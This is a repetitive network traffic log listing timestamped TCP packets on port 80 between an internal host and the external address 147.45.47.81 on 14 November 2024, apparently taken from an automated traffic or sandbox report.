                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567872047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567883015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567893982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567903042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567914963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567925930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.567936897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.568622112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.585494995 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588188887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588207960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588219881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588321924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588332891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588344097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588350058 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588381052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588392019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588402033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.588407993 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591510057 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591700077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591711998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591731071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591741085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591752052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591762066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591773033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591783047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591794014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591804028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591814041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591824055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591835022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591845036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591861010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591871977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591882944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591892958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591902971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591913939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591923952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591936111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591947079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591949940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591959953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591974020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.591984987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592001915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592014074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592025042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592035055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592047930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592057943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592070103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592078924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592092037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592103004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592113972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592127085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592138052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592149019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592175961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592200041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592223883 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592223883 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592228889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592247963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592257023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592267036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592278004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592287064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592299938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592310905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592323065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592339993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592350960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592360973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592372894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592382908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592394114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592405081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592415094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592426062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592437029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592447042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592473984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592483997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592494011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592505932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592514992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592525005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592541933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592555046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592571974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592582941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592593908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592603922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592614889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592626095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592638016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592648983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592652082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592663050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592674971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592684031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592699051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592700005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592700005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592700005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592710972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592720985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592731953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592745066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592755079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592771053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592781067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592806101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592818022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592828035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592839956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592849970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592859983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592871904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592881918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592892885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592938900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592955112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592966080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592967987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592967987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592967987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592967987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592967987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592977047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.592988968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593000889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593014002 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593017101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593027115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593039989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593102932 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593103886 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593103886 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593111992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593123913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593136072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593147039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593157053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593168020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593178988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593189955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593199968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593210936 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593220949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593228102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593234062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593245029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593245029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593245983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593245029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593260050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593272924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593288898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593301058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593312025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593322992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593333960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593344927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593355894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593365908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593377113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593388081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593399048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593409061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593425989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593436956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593444109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593445063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593447924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593463898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593463898 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593465090 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593477011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593487978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593503952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593514919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593525887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593537092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593545914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593556881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593568087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593579054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593590021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593697071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593707085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593718052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593735933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593746901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593759060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593771935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593862057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593873024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593883991 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593894958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593905926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593915939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593926907 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593951941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593962908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593977928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593987942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.593998909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594010115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594019890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594031096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594037056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594073057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594086885 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594120979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594131947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594141960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594152927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594163895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594173908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594187021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594197989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594208956 CET8049957147.45.47.81192.168.2.10
